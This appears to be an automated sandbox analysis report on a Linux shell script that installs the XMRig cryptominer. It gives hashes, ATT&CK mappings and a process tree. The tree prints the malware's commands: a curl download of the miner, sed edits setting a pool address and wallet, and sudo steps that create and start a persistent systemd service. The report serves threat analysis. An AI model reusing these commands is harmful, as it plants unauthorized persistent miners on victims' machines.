xmrig_linux | d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d

Analysis

max time kernel
12s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
27/03/2025, 09:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d.sh
Size

12KB
MD5

141cab1fb37bf8965b41b67ba12953f6
SHA1

ac5ad102aeb2dce1a48248df20bc132485daa3be
SHA256

d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d
SHA512

280558159a8bf8236e91ec7e03f5d8c95a32381167ab15fcf7d0999d5aecec70c46db4824e85788d570e349a279eeb031bea5da611914495b32c36e4bdb33293
SSDEEP

384:hOUS1SKKJW78m+D+cl+LjzqWTj1PmsbB1CH:wUS1SxJW78HNl+LjOWTj1PmI6H

Score

10^/10

xmrig_linux defense_evasion discovery miner persistence privilege_escalation upx

Malware Config

Signatures

Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1575	chmod

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 7 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
1599	sudo
1621	sudo
1643	sudo
1537	sudo
1539	sudo
1592	sudo
1596	sudo

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence privilege_escalation

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/etc/systemd/system/4thepool_miner.service	tee

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-2.dat	upx

Reads CPU attributes 1 TTPs 2 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	free
File opened for reading	/sys/devices/system/cpu/online	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/7/status	pgrep
File opened for reading	/proc/18/status	pgrep
File opened for reading	/proc/159/cmdline	pgrep
File opened for reading	/proc/480/cmdline	pgrep
File opened for reading	/proc/481/cmdline	pgrep
File opened for reading	/proc/1079/cmdline	pgrep
File opened for reading	/proc/1194/cmdline	pgrep
File opened for reading	/proc/1336/status	pgrep
File opened for reading	/proc/3/status	pgrep
File opened for reading	/proc/556/status	pgrep
File opened for reading	/proc/1166/status	pgrep
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/537/cmdline	pgrep
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/165/cmdline	pgrep
File opened for reading	/proc/667/cmdline	pgrep
File opened for reading	/proc/1151/cmdline	pgrep
File opened for reading	/proc/1193/status	pgrep
File opened for reading	/proc/1498/cmdline	pgrep
File opened for reading	/proc/5/status	pgrep
File opened for reading	/proc/115/status	pgrep
File opened for reading	/proc/487/status	pgrep
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/fd	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/status	pgrep
File opened for reading	/proc/8/cmdline	pgrep
File opened for reading	/proc/21/cmdline	pgrep
File opened for reading	/proc/166/status	pgrep
File opened for reading	/proc/676/status	pgrep
File opened for reading	/proc/1073/status	pgrep
File opened for reading	/proc/1112/status	pgrep
File opened for reading	/proc/167/status	pgrep
File opened for reading	/proc/167/cmdline	pgrep
File opened for reading	/proc/479/status	pgrep
File opened for reading	/proc/537/status	pgrep
File opened for reading	/proc/1161/status	pgrep
File opened for reading	/proc/1497/cmdline	pgrep
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/17/cmdline	pgrep
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/10/status	pgrep
File opened for reading	/proc/160/status	pgrep
File opened for reading	/proc/728/status	pgrep
File opened for reading	/proc/1126/cmdline	pgrep
File opened for reading	/proc/1384/cmdline	pgrep
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/5/cmdline	pgrep
File opened for reading	/proc/11/status	pgrep
File opened for reading	/proc/26/status	pgrep
File opened for reading	/proc/32/cmdline	pgrep
File opened for reading	/proc/170/status	pgrep
File opened for reading	/proc/709/status	pgrep
File opened for reading	/proc/1499/status	pgrep
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/16/cmdline	pgrep
File opened for reading	/proc/164/status	pgrep
File opened for reading	/proc/475/cmdline	pgrep
File opened for reading	/proc/496/cmdline	pgrep
File opened for reading	/proc/1/sched	systemctl

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1584	sed

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sh-thd.J4bDcX	d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d.sh
File opened for modification	/tmp/xmrig.tar.gz	curl
File opened for modification	/tmp/4thepool/xmrig	tar
File opened for modification	/tmp/4thepool/sedV4jVGU	sed
File opened for modification	/tmp/4thepool/sedSmWRIT	sed
File opened for modification	/tmp/4thepool/sedPcF27T	sed
File opened for modification	/tmp/4thepool/config.json	tar
File opened for modification	/tmp/4thepool/config.json.bak	cp
File opened for modification	/tmp/4thepool/sedbvHEjU	sed
File opened for modification	/tmp/4thepool/sedyGiMeU	sed
File opened for modification	/tmp/4thepool/sedxu79VT	sed
File opened for modification	/tmp/4thepool/sedsZZe5T	sed

/tmp/d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d.sh
/tmp/d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d.sh
1⤵
- Writes file to tmp directory
PID:1503
- /usr/bin/clear
  clear
  2⤵
  PID:1504
- /usr/bin/id
  id -u
  2⤵
  PID:1505
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1506
- /bin/sleep
  sleep 2
  2⤵
  PID:1507
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1518
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:1521
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1522
- /usr/bin/nproc
  nproc
  2⤵
  PID:1523
- /usr/bin/awk
  awk "/^Mem:/{print \$2}"
  2⤵
  PID:1526
- /usr/bin/free
  free -m
  2⤵
  - Reads CPU attributes
  PID:1525
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1527
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1528
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1529
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1530
- /bin/grep
  grep -q c3pool_miner.service
  2⤵
  PID:1532
- /bin/systemctl
  systemctl list-unit-files
  2⤵
  PID:1531
- /bin/grep
  grep -q moneroocean_miner.service
  2⤵
  PID:1534
- /bin/systemctl
  systemctl list-unit-files
  2⤵
  - Reads runtime system information
  PID:1533
- /bin/grep
  grep -q 4thepool_miner.service
  2⤵
  PID:1536
- /bin/systemctl
  systemctl list-unit-files
  2⤵
  - Reads runtime system information
  PID:1535
- /usr/bin/sudo
  sudo -n true
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1537
- - /bin/true
    true
    3⤵
    PID:1538
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1539
- - /bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads runtime system information
    PID:1540
- /usr/bin/pgrep
  pgrep -x xmrig
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1561
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1562
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1563
- /bin/sleep
  sleep 5
  2⤵
  PID:1564
- /bin/mkdir
  mkdir -p /tmp/4thepool
  2⤵
  PID:1565
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1566
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1567
- /usr/bin/curl
  curl --connect-timeout 30 -L https://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1570
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1571
- /bin/tar
  tar xf /tmp/xmrig.tar.gz -C /tmp/4thepool
  2⤵
  - Writes file to tmp directory
  PID:1572
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1573
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1573
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1573
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1573
- - /sbin/gzip
    gzip -d
    3⤵
    PID:1573
- - /bin/gzip
    gzip -d
    3⤵
    PID:1573
- /bin/rm
  rm -f /tmp/xmrig.tar.gz
  2⤵
  PID:1574
- /bin/chmod
  chmod +x /tmp/4thepool/xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:1575
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1576
- /bin/sed
  sed "s/[^a-zA-Z0-9]/_/g"
  2⤵
  PID:1579
- /bin/hostname
  hostname
  2⤵
  PID:1578
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1580
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1581
- /bin/cp
  cp /tmp/4thepool/config.json /tmp/4thepool/config.json.bak
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1582
- /bin/sed
  sed -i "s#\"url\":.*#\"url\": \"auto.4thepool.lol:3333\",#" /tmp/4thepool/config.json
  2⤵
  - Writes file to tmp directory
  PID:1583
- /bin/sed
  sed -i "s#\"user\":.*#\"user\": \"486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmPD\",#" /tmp/4thepool/config.json
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1584
- /bin/sed
  sed -i "s#\"pass\":.*#\"pass\": \"ubuntu1804_amd64_20240729_en_4\",#" /tmp/4thepool/config.json
  2⤵
  - Writes file to tmp directory
  PID:1585
- /bin/sed
  sed -i "s/\"cpu\": {/\"cpu\": {\\n \"enabled\": true,\\n \"priority\": 5,\\n \"threads\": 1,/" /tmp/4thepool/config.json
  2⤵
  - Writes file to tmp directory
  PID:1586
- /bin/sed
  sed -i "s/\"rx\": {/\"rx\": {\\n \"1gb-pages\": true,\\n \"rdmsr\": true,/" /tmp/4thepool/config.json
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/sed
  sed -i "s/\"donate-level\": [0-9]*,/\"donate-level\": 1,/" /tmp/4thepool/config.json
  2⤵
  - Writes file to tmp directory
  PID:1588
- /bin/sed
  sed -i "s/\"print-time\": [0-9]*,/\"print-time\": 60,/" /tmp/4thepool/config.json
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1589
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1590
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1591
- /usr/bin/sudo
  sudo -n true
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1592
- - /bin/true
    true
    3⤵
    PID:1593
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1594
- /usr/bin/sudo
  sudo tee /etc/systemd/system/4thepool_miner.service
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1596
- - /usr/bin/tee
    tee /etc/systemd/system/4thepool_miner.service
    3⤵
    - Modifies systemd
    PID:1598
- /usr/bin/whoami
  whoami
  2⤵
  PID:1597
- /bin/cat
  cat
  2⤵
  PID:1595
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1599
- - /bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads runtime system information
    PID:1600
- /usr/bin/sudo
  sudo systemctl enable 4thepool_miner.service
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1621
- - /bin/systemctl
    systemctl enable 4thepool_miner.service
    3⤵
    PID:1622
- /usr/bin/sudo
  sudo systemctl start 4thepool_miner.service
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1643
- - /bin/systemctl
    systemctl start 4thepool_miner.service
    3⤵
    - Reads runtime system information
    PID:1644
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1646
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1647
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1648
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1649
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1650
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1651
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1652
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1653

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/4thepool/config.json

Filesize
2KB

MD5
eacca315516ac1e67cf8186125e8c91d

SHA1
02cebcdac9468f863f491a508b87e649d24db04d

SHA256
4930e0eb9d62e77c7295900508edd8502880ecccbebf727f5ab353f94dc3419a

SHA512
5275a8675375047d122432950a5d0eb8f27c9aafcaeb132ecd4a0da55ce3a627320973b073229b27dc0d2d23f174a7d5640072280b70fcfb6d011c7f8bf7cf88

Download Submit
/tmp/4thepool/sedSmWRIT

Filesize
2KB

MD5
989796beacd749925cf2b411e449d719

SHA1
de5c033a0ce83f89782ec4f499b00330716d68ca

SHA256
1c514c61a67aa589e32adcb82bf312a17cba3241207cb1fcff630626c29c6c25

SHA512
d17eb9e94dab5b4c1b7b6d4cb47489832850313a4aa7a1fd67536e7119f2370c3ea6a2fa260f91668f108c618a96609f2736bcb3f7c85109d318760d8dedc290

Download Submit
/tmp/4thepool/sedV4jVGU

Filesize
2KB

MD5
776691a51aa25fced39d005292464695

SHA1
900df622ac20537fa267ec91a04a00112e339b03

SHA256
78001b78e9dd966e1314635a9fe3e070b38b75b7c13a9517076d7620b7b858c4

SHA512
1d83bba7c38c76e4657cb83e984ec2628f9564e707a641532eddf3da6dc9104cf7e5d81f8540fc19ad916754b2f6dfacd501f090f0257db5f611c9557a4ca90a

Download Submit
/tmp/4thepool/sedbvHEjU

Filesize
2KB

MD5
9a90286d4bf7a64a1b39d280fb29f37b

SHA1
1caabcb10236762c6e0948c7fcb7024658b66fef

SHA256
1e470a2eee0aa7585c7514c0771c20f8dd518e7432580b1a14a9cd9d4d4fac48

SHA512
e85c5c6fa809ea5f372b062195b3652d2b8da8a2977422c4619ea020d3400f73e79e7509c5b4be83143b26ac10e53f021e106fc98a7d6aa3ebac2e91ef1f2524

Download Submit
/tmp/4thepool/sedyGiMeU

Filesize
2KB

MD5
8c5b959d4f029401865326ba6f7225c4

SHA1
ab683252ac86808f5905e8ad918458d0b14b23f2

SHA256
53d90bd090ce7571e1e9a86b48024fc8078f8e4e666924d3fe702f076e7c75e1

SHA512
2de7cbcdddfc8d428be6b9e5b137ddcb5ec88d693b49acfa0cab436b7743141946372e43f808ed9819427563af153941b450322fb63a6bb6ddaa5fe2cb568c91

Download Submit
/tmp/4thepool/xmrig

Filesize
3.2MB

MD5
b5390ba22dd90fe2ed6e35af985ea621

SHA1
0b907eee9a85d39f8f0d7c503cc1f84a71c4de10

SHA256
e00e9f9d8d3ea668fbc88ed25a9eefb5b9d8d86a993ff78482500e99ae64351e

SHA512
6dd915590b969b35798525366594e1ae1a4b57676500b99cca39f8c95f4fd2d1d253df639cc516ce123bd0ff5197cb6f5859d14731dd83941cda40fa6bca002a

Download Submit
/tmp/sh-thd.J4bDcX

Filesize
249B

MD5
547e23c2182bede1f02434f6e5db046d

SHA1
38e05c97a278af1d25b0de5db019cf59257a2121

SHA256
4048ddcaa699cf566b0696b2144660007e6c4343ff33451f9e4fd5e387669d24

SHA512
511a1b4aa7a6e9f3b867c6caea0e9274de3f2846f870003f4b3b2154d59f9e592de0d098ad27188d9071a8b6cf3af493649b1f6906f99339ceddd14b31d6159f

Download Submit
/tmp/xmrig.tar.gz

Filesize
3.2MB

MD5
6dc1042c4666cb3f9aac03efe4304add

SHA1
ffbec552deff72cac76d3fd97a444b6e6ee48e7f

SHA256
7f9ae2402469f4dafdcc859c7b46e76a5e5dae638d5bf880938541f318ca3b1f

SHA512
8716c3f2be8d2dfa62fe00319f1126a99eb75dd914096970d5dc92be2e2ce03ac5e10fa6aba471668acb877fe7b4145e1d9b329fa805026429940629969110a5

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads